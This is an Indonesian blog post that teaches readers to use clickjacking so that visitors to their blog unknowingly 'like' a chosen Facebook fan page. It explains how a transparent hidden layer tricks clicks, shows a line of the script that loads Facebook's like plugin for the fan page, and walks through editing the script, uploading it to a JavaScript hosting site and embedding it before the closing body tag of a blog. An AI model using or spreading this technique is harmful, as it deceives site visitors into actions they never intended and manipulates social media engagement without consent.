Cara Clickjacking Untuk menambah fans page

Cara Menambah Fans Halaman Facebook Dengan Otomatis - Clickjacking

Tutorial ini cocok bagi kamu yang ingin punya Fans Page dan Meraup banyak Member, dan pasti yang like Fan Page Kamu sebanyak mungkin....PASTI

Pengertian : Clickjacking adalah teknik menipu pengguna sembarangan Web mengungkapkan informasi rahasia atau mengambil alih komputer mereka sementara mengklik pada halaman Web yang tampaknya tidak berbahaya. Sebuah kerentanan di berbagai browser dan platform, sebuah clickjacking mengambil bentuk kode tertanam atau script yang dapat mengeksekusi tanpa sepengetahuan pengguna, seperti mengklik pada tombol yang muncul untuk melakukan fungsi lain.

Clickjacking ini dimungkinkan karena fitur yang tampaknya tidak berbahaya dari HTML halaman Web dapat digunakan untuk melakukan tindakan tak terduga.

Sebuah trik halaman clickjacked pengguna ke dalam melakukan tindakan yang tidak diinginkan dengan mengklik link tersembunyi. Pada halaman clickjacked, para penyerang menunjukkan serangkaian tombol dummy, lalu load halaman lain di dalam lapisan transparan. Para pengguna berpikir bahwa mereka adalah mengklik tombol terlihat, sedangkan mereka benar-benar melakukan tindakan pada halaman tersembunyi. Halaman tersembunyi mungkin menjadi halaman otentik, dan oleh karena itu penyerang bisa mengelabui pengguna melakukan tindakan yang pengguna tidak pernah dimaksudkan untuk dilakukan dan tidak ada cara untuk melacak tindakan seperti kemudian, ketika pengguna benar-benar dikonfirmasi pada halaman lain.

Sript Auto Like Facebook Fans Page :

Script ini hasil modifikasi saya dari sebuah script yg bernama clickjacking. Tapi tentunya script ini jauh berbeda dengan script clickjacking tersebut. Karna fungsi script clickjacking tentunya hanya mnglike halaman blog kita, BUKAN fans page facebook kita.

Menurut saya fungsi script clickjacking kurang bermanfaat, karna script ini hanya menglike halaman blog kita saja, tapi kalau script yg saya buat lumayan berguna bagi sobat yg ingin fans pagenya mempunyai banyak penggemar. Keuntungan banyak penggemar di fans page yaitu memudahkan kita untuk mempromosikan artikel di blog kita.

 
Langkah-langkah 
Di dalam file zip ini, saya telah memasukan 2 file, yg pertama facebook-script.js dan text cara install ini.

Di dalam file
facebook-script.js itu adalah script saya yg masih berisi link like untuk fanspage (halaman facebook) saya.

Download File nya dengan mengklik tombol dibawah ini


Jika Anda ingin menginstal'na di blog / situs Anda, Anda harus merubah isi link yg ada di script saya itu.

Pertama-tama Anda extrak terlebih dahulu file
facebook-script.js di folder yg Anda kehendaki. Lalu rename nama file tersebut menjadi facebook-script.txt - Akhiran js di ganti menjadi txt : agar memudahkan kita mengedit isi file js tersebut.

lalu klik 2 kali file js yg sudah di rubah menjadi txt itu, dan cari link fanspage yang ada :
 
lbox.src = 'http://www.facebook.com/plugins/like.php?href=' + encodeURIComponent(/*document.location.href*/ 'http://facebook.com/nama-fan-page-kamu') + '&layout=standard&show_faces=true&widt h=53&action=lbox&colorscheme=light&hei ght=80';
(script diatas cuma sample, selengkapnya harus didownload terlebih dahulu)



Jika sudah didownload . Ganti tulisan warna merah tersebut dengan url facebook fan page kamu, dan simpan (save as) dengan nama : jscript.js

Tips : Gunakan "ctrl" + "f" lalu copas link yg berwarna merah agar memudahkan mencari dimana link. Jika sudah ketemu, ganti link itu dengan link fanspage facebook Anda.
Jika sudah di ganti, rename kembali menjadi
facebook-script.js
nama file bs sesuka hati kalian, tapi usahakan nama file di beri akhiran "js"
nah sekarang saatnya kalian buka browser (terserah mau mozilla atau exploler) lalu buka alamat:

www.yourjavascript.com

Nah di situlah Anda akan mengupload sript tersebut.
Upload sript Anda dan masukan email Anda.

Email dibutuhkan untuk mengirim kode script yg nantinya akan Anda gunakan (pasang) di blog / situs Anda.

jika Anda telah menerima email dari admin@yourjavascript.com Anda tinggal copy kode tersebut dan Anda paste tepat sebelum tag </body>


contoh kode yg harus di pasang (yg di kirim oleh admin@yourjavascript.com)

<script type="text/javascript" src="http://yourjavascript.com/122128093/facebook-script.js"></script>

Cara kerja script ini sangat mudah, kalian hanya memasang script ini di blog kalian.
Lalu jika ada pengunjung yang mampir ke blog sobat, otomatis si pengunjung akan meng'like fans page facebook yang sobat tentukan sendiri halamannya.
Mudah bukan?

0 Response to "Cara Clickjacking Untuk menambah fans page"

Posting Komentar